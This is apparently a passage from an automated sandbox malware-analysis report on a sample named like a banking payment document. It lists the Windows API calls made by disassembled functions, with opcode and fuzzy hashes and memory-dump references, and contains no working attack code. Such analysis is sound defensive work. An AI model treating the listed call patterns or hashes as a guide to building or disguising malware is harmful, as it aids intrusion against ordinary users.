                                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                • String ID: BUTTON
                                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                                • Opcode ID: bc60b1a659784be1cd91a491333127d025ab1d84cb765ffcefe3f373b4656ea1
                                                                                                                                • Instruction ID: 2a36ae2e6e8625d9992f58f0fcfdae7e2b08b67e685eaba7506684503a8ea9d9
                                                                                                                                • Opcode Fuzzy Hash: bc60b1a659784be1cd91a491333127d025ab1d84cb765ffcefe3f373b4656ea1
                                                                                                                                • Instruction Fuzzy Hash: 8321C9B0741A45AFE7107F70ECC8A363BA9FB5E785F089028F102851B1DB7D4D208B69
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0078D5EA
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0078D67D
                                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0078D691
                                                                                                                                • CoCreateInstance.OLE32(007B2D7C,00000000,00000001,007D8C1C,?), ref: 0078D6DD
                                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0078D74C
                                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0078D7A4
                                                                                                                                • _memset.LIBCMT ref: 0078D7E1
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0078D81D
                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0078D840
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0078D847
                                                                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0078D87E
                                                                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0078D880
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1246142700-0
                                                                                                                                • Opcode ID: 3bde7af9405602dd8fbb15c458c1edfade2213abc112be436fe7e0d94cb5e109
                                                                                                                                • Instruction ID: f354b3a084a5a2a79bb68b0f7117d0f4fcd8f2903478fb8d2889a93cab019635
                                                                                                                                • Opcode Fuzzy Hash: 3bde7af9405602dd8fbb15c458c1edfade2213abc112be436fe7e0d94cb5e109
                                                                                                                                • Instruction Fuzzy Hash: 0BB1F975A00119EFDB14EFA4C888DAEBBB9EF49314F148469E909EB261DB34ED41CB50
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0077C283
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0077C295
                                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0077C2F3
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0077C2FE
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0077C310
                                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0077C364
                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0077C372
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0077C383
                                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0077C3C6
                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0077C3D4
                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0077C3F1
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0077C3FE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                • Opcode ID: f8455f6724199763cdcb8e74a63850e82efbe0af8c7f747642b0e20ad30f2c5c
                                                                                                                                • Instruction ID: 2c26e1a0b1bafeb2f57ee83cf7281a5a4659bd7bdfde3d7f830a451f4e3b249a
                                                                                                                                • Opcode Fuzzy Hash: f8455f6724199763cdcb8e74a63850e82efbe0af8c7f747642b0e20ad30f2c5c
                                                                                                                                • Instruction Fuzzy Hash: F7514D71B00205ABDF18CFA9DD89AAEBBBAEB89310F14C12DF51AD7290D7749D008B14
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00721B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00722036,?,00000000,?,?,?,?,007216CB,00000000,?), ref: 00721B9A
                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007220D3
                                                                                                                                • KillTimer.USER32(-00000001,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0072216E
                                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0075BCA6
                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0075BCD7
                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0075BCEE
                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007216CB,00000000,?,?,00721AE2,?,?), ref: 0075BD0A
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0075BD1C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 641708696-0
                                                                                                                                • Opcode ID: d8bce821dfe1c3479c015b8cc7cadfc47ac63a37d6e441a949938b4e756c6dc8
                                                                                                                                • Instruction ID: 3c50ca46597c59ce806e9efeb8d505550acf82708197e1b1fc45f38dfb2b2aad
                                                                                                                                • Opcode Fuzzy Hash: d8bce821dfe1c3479c015b8cc7cadfc47ac63a37d6e441a949938b4e756c6dc8
                                                                                                                                • Instruction Fuzzy Hash: F461BE31101B64EFCB359F14E988B36B7F2FB45306F508528E9824A571C7BCE892DB94
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 007225DB: GetWindowLongW.USER32(?,000000EB), ref: 007225EC
                                                                                                                                • GetSysColor.USER32(0000000F), ref: 007221D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ColorLongWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 259745315-0
                                                                                                                                • Opcode ID: fccdc59ec68c8e8b53f44bfda747c53017511692efc28f9cf2eb8fe0379673ee
                                                                                                                                • Instruction ID: 25fc309e644f3f72ced77b23ae96a61d6585d415a0196fedccfe26b087ed8b1b
                                                                                                                                • Opcode Fuzzy Hash: fccdc59ec68c8e8b53f44bfda747c53017511692efc28f9cf2eb8fe0379673ee
                                                                                                                                • Instruction Fuzzy Hash: 6B41B131000154EBDB255F68EC88BB93BA5FB46331F298365FD659A1E2C73A8C43DB25
                                                                                                                                APIs
                                                                                                                                • CharLowerBuffW.USER32(?,?,007AF910), ref: 0078A90B
                                                                                                                                • GetDriveTypeW.KERNEL32(00000061,007D89A0,00000061), ref: 0078A9D5
                                                                                                                                • _wcscpy.LIBCMT ref: 0078A9FF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                • API String ID: 2820617543-1000479233
                                                                                                                                • Opcode ID: a9f08e5be9e768b75b3e6c266ff96a850adf16b4fe4c5b71663d2df632d783f7
                                                                                                                                • Instruction ID: bea90216586850e3cfb3ec339e5c6603a552b1e5ec9c2b30697e09016009580d
                                                                                                                                • Opcode Fuzzy Hash: a9f08e5be9e768b75b3e6c266ff96a850adf16b4fe4c5b71663d2df632d783f7
                                                                                                                                • Instruction Fuzzy Hash: 9C51B031148301EBD304EF14D896AAFB7A9FF85310F14882EF595572A2DB39AD09CB93
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __i64tow__itow__swprintf
                                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                                • API String ID: 421087845-2263619337
                                                                                                                                • Opcode ID: 6190f1a13d94379f0557f62a88b3d4b3deaa770c3e93efee14aaa9a4ab49e2c3
                                                                                                                                • Instruction ID: 01520e7ecfd0cc8bc99b118d1fe4a6e3a7dd616ceeddb091c0cdf3b03d396010
                                                                                                                                • Opcode Fuzzy Hash: 6190f1a13d94379f0557f62a88b3d4b3deaa770c3e93efee14aaa9a4ab49e2c3
                                                                                                                                • Instruction Fuzzy Hash: 4B41B471A00215EFDB24DF34E846EBA77E8FF05300F28446EEA49D7292FA799945CB11
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 007A716A
                                                                                                                                • CreateMenu.USER32 ref: 007A7185
                                                                                                                                • SetMenu.USER32(?,00000000), ref: 007A7194
                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A7221
                                                                                                                                • IsMenu.USER32(?), ref: 007A7237
                                                                                                                                • CreatePopupMenu.USER32 ref: 007A7241
                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A726E
                                                                                                                                • DrawMenuBar.USER32 ref: 007A7276
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                • String ID: 0$F
                                                                                                                                • API String ID: 176399719-3044882817
                                                                                                                                • Opcode ID: f68e53c23c0c8c92aa3bf3bb46f38a077d3a1d55cc8ada4b0e12a33fbcc40d65
                                                                                                                                • Instruction ID: b2b98845b32b2fee95bcb0e58efb6712fd1d5f4dcd1f0657ed1882a6ebd80705
                                                                                                                                • Opcode Fuzzy Hash: f68e53c23c0c8c92aa3bf3bb46f38a077d3a1d55cc8ada4b0e12a33fbcc40d65
                                                                                                                                • Instruction Fuzzy Hash: 6A415674A01209EFDB24DFA4D884F9A7BB5FF8A310F144128F945A73A1D739A920CF94
                                                                                                                                APIs
                                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007A755E
                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 007A7565
                                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007A7578
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 007A7580
                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007A758B
                                                                                                                                • DeleteDC.GDI32(00000000), ref: 007A7594
                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 007A759E
                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007A75B2
                                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007A75BE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                • String ID: static
                                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                                • Opcode ID: 73845025076e8b69fd3c1c1e333f9362f2e04828eb08e1c23656a1baa91629b8
                                                                                                                                • Instruction ID: 354bd92b4f4697711fd15692107b14ae079ce31c698982c714e4005de00d97fb
                                                                                                                                • Opcode Fuzzy Hash: 73845025076e8b69fd3c1c1e333f9362f2e04828eb08e1c23656a1baa91629b8
                                                                                                                                • Instruction Fuzzy Hash: B4316C72504218EBDF159FA4DC08FDB3B69FF8A320F114324FA55960A0C739D821DBA8
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00746E3E
                                                                                                                                  • Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28
                                                                                                                                • __gmtime64_s.LIBCMT ref: 00746ED7
                                                                                                                                • __gmtime64_s.LIBCMT ref: 00746F0D
                                                                                                                                • __gmtime64_s.LIBCMT ref: 00746F2A
                                                                                                                                • __allrem.LIBCMT ref: 00746F80
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00746F9C
                                                                                                                                • __allrem.LIBCMT ref: 00746FB3
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00746FD1
                                                                                                                                • __allrem.LIBCMT ref: 00746FE8
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00747006
                                                                                                                                • __invoke_watson.LIBCMT ref: 00747077
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 384356119-0
                                                                                                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                • Instruction ID: 7ba7011a5dc15f1b61797f191c76a3cd6b52c1550a27acd42e137d63f056bc1e
                                                                                                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                • Instruction Fuzzy Hash: 39712676A00716EBD718AF68DC45BAAB3F8BF05364F108229F814D7291F778DD448B91
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00782542
                                                                                                                                • GetMenuItemInfoW.USER32(007E5890,000000FF,00000000,00000030), ref: 007825A3
                                                                                                                                • SetMenuItemInfoW.USER32(007E5890,00000004,00000000,00000030), ref: 007825D9
                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 007825EB
                                                                                                                                • GetMenuItemCount.USER32(?), ref: 0078262F
                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0078264B
                                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00782675
                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 007826BA
                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00782700
                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00782714
                                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00782735
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4176008265-0
                                                                                                                                • Opcode ID: 15ac7096cf55bec202286cb5f57403c3c0efc163b82fe6f97f92e4da0e87d080
                                                                                                                                • Instruction ID: f45a6c10e7679650781b80bc62a0f7acd00939dc1e774ff525259e7754922a2e
                                                                                                                                • Opcode Fuzzy Hash: 15ac7096cf55bec202286cb5f57403c3c0efc163b82fe6f97f92e4da0e87d080
                                                                                                                                • Instruction Fuzzy Hash: CB61E3B0A40249EFDF11EFA4CC88DBE7BB8FB45306F144059E941A7252E739AD16DB20
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007A6FA5
                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007A6FA8
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A6FCC
                                                                                                                                • _memset.LIBCMT ref: 007A6FDD
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A6FEF
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007A7067
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 830647256-0
                                                                                                                                • Opcode ID: 53e28c3b2cc032fb90a5ee31ef75d4a65d8b547b6d031babfa5d737a71de0f04
                                                                                                                                • Instruction ID: c0f8bf71b2bc9b48bae6b4428c872147e3d5b77fc98e5187fbf683f048503790
                                                                                                                                • Opcode Fuzzy Hash: 53e28c3b2cc032fb90a5ee31ef75d4a65d8b547b6d031babfa5d737a71de0f04
                                                                                                                                • Instruction Fuzzy Hash: 2E618C75900248EFDB10DFA4CC85EEE77F8EB49714F144269FA14AB2A1C779AD41CBA0
                                                                                                                                APIs
                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00776BBF
                                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00776C18
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00776C2A
                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00776C4A
                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00776C9D
                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00776CB1
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00776CC6
                                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00776CD3
                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00776CDC
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00776CEE
                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00776CF9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                • Opcode ID: 52c1fb0926ad728cfbd595f83fb80e8c988c8f289bdb3113d13bf5ec3f1f181c
                                                                                                                                • Instruction ID: 7331eee5a3bc27718714341808c2521bc9def4d9ccfd3926b55cbdfd63c94b0f
                                                                                                                                • Opcode Fuzzy Hash: 52c1fb0926ad728cfbd595f83fb80e8c988c8f289bdb3113d13bf5ec3f1f181c
                                                                                                                                • Instruction Fuzzy Hash: 77417F71A00219DFCF00DFA8D8489EEBBB9EF48350F04C069E955E7261DB38A945CFA4
                                                                                                                                APIs
                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00795793
                                                                                                                                • inet_addr.WSOCK32(?,?,?), ref: 007957D8
                                                                                                                                • gethostbyname.WSOCK32(?), ref: 007957E4
                                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 007957F2
                                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00795862
                                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00795878
                                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007958ED
                                                                                                                                • WSACleanup.WSOCK32 ref: 007958F3
                                                                                                                                Strings
